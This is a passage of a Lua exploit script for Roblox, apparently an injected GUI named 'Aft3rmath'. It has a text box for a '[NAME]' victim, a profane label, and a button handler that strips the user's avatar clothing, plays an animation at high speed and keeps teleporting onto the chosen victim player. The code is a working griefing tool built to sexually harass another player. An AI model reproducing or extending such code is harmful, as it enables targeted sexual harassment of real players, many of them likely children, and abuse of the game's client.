		tbxVictim.BackgroundColor3 = Color3.new(0.207843, 0.207843, 0.207843)
		tbxVictim.BorderSizePixel = 1
		tbxVictim.Position = UDim2.new (0.533, 0,0.229, 0)
		tbxVictim.Size = UDim2.new (0, 133,0, 27)
		tbxVictim.Visible = true
		tbxVictim.Active = true
		tbxVictim.Draggable = false
		tbxVictim.Selectable = true
		tbxVictim.Font = Enum.Font.SourceSansBold
		tbxVictim.Text = "[NAME]"
		tbxVictim.TextColor3 = Color3.new(1, 0, 0)
		tbxVictim.TextSize = 20
	
		lblFUCKEMALL.Name = "FUCKEMALL"
		lblFUCKEMALL.Parent = FGUI
		lblFUCKEMALL.BackgroundColor3 = Color3.new(0.207843, 0.207843, 0.207843)
		lblFUCKEMALL.BorderSizePixel = 1
		lblFUCKEMALL.Position = UDim2.new (0.025, 0,0.856, 0)
		lblFUCKEMALL.Size = UDim2.new (0, 301,0, 27)
		lblFUCKEMALL.Visible = true
		lblFUCKEMALL.Font = Enum.Font.SourceSansBold
		lblFUCKEMALL.Text = "FUCK AND FUCK"
		lblFUCKEMALL.TextColor3 = Color3.new(1, 0, 0)
		lblFUCKEMALL.TextSize = 20
	
	
	
	
		--Scripts
	
	
		btnSex.MouseButton1Click:Connect(function()
	
			local player = tbxVictim.Text
			local stupid = Instance.new('Animation')
			stupid.AnimationId = 'rbxassetid://148840371'
			hummy = game:GetService("Players").LocalPlayer.Character.Humanoid
			pcall(function()
				hummy.Parent.Pants:Destroy()
			end)
			pcall(function()
				hummy.Parent.Shirt:Destroy()
			end)
			local notfunny = hummy:LoadAnimation(stupid)
			notfunny:Play()
			notfunny:AdjustSpeed(10)
			while hummy.Parent.Parent ~= nil do
				wait()
				game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = game.Players[tbxVictim.Text].Character.HumanoidRootPart.CFrame
			end
		end)
	end)
	
end
coroutine.wrap(IZYSRV_fake_script)()
local function ADYFWP_fake_script() -- Aft3rmath.LocalScript 
	local script = Instance.new('LocalScript', Aft3rmath)

	
end
coroutine.wrap(ADYFWP_fake_script)()
local function LSIUQRO_fake_script() -- Aft3rmath.LocalScript 
	local script = Instance.new('LocalScript', Aft3rmath)

	local UIS = game:GetService('UserInputService')
	local frame = script.Parent
	local dragToggle = nil
	local dragSpeed = 0.25
	local dragStart = nil
	local startPos = nil
	
	local function updateInput(input)
		local delta = input.Position - dragStart
		local position = UDim2.new(startPos.X.Scale, startPos.X.Offset + delta.X,
			startPos.Y.Scale, startPos.Y.Offset + delta.Y)
		game:GetService('TweenService'):Create(frame, TweenInfo.new(dragSpeed), {Position = position}):Play()
	end
	
	frame.InputBegan:Connect(function(input)
		if (input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch) then 
			dragToggle = true
			dragStart = input.Position
			startPos = frame.Position
			input.Changed:Connect(function()
				if input.UserInputState == Enum.UserInputState.End then
					dragToggle = false
				end
			end)
		end
	end)
	
	UIS.InputChanged:Connect(function(input)
		if input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch then
			if dragToggle then
				updateInput(input)
			end
		end
	end)
end
coroutine.wrap(LSIUQRO_fake_script)()
local function ZWVHUV_fake_script() -- ResetButton.LocalScript 
	local script = Instance.new('LocalScript', ResetButton)

	script.Parent.MouseButton1Click:Connect(function()
		game.Players.LocalPlayer.Character.Humanoid.Health = 0
		game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(0, 0, 0)
	end)
	
end
coroutine.wrap(ZWVHUV_fake_script)()
local function XXQAD_fake_script() -- Base.LocalScript 
	local script = Instance.new('LocalScript', Base)

	local base = script.Parent
	
	wait(1)
	base:TweenSize(UDim2.new(0, 1000,0, 0),"Out","Linear",15)
	wait(4.2)
	script.Parent.Parent.Parent.Visible = false
	script.Parent.Parent.Parent.Parent.Aft3rmath.Visible = true
end
coroutine.wrap(XXQAD_fake_script)()
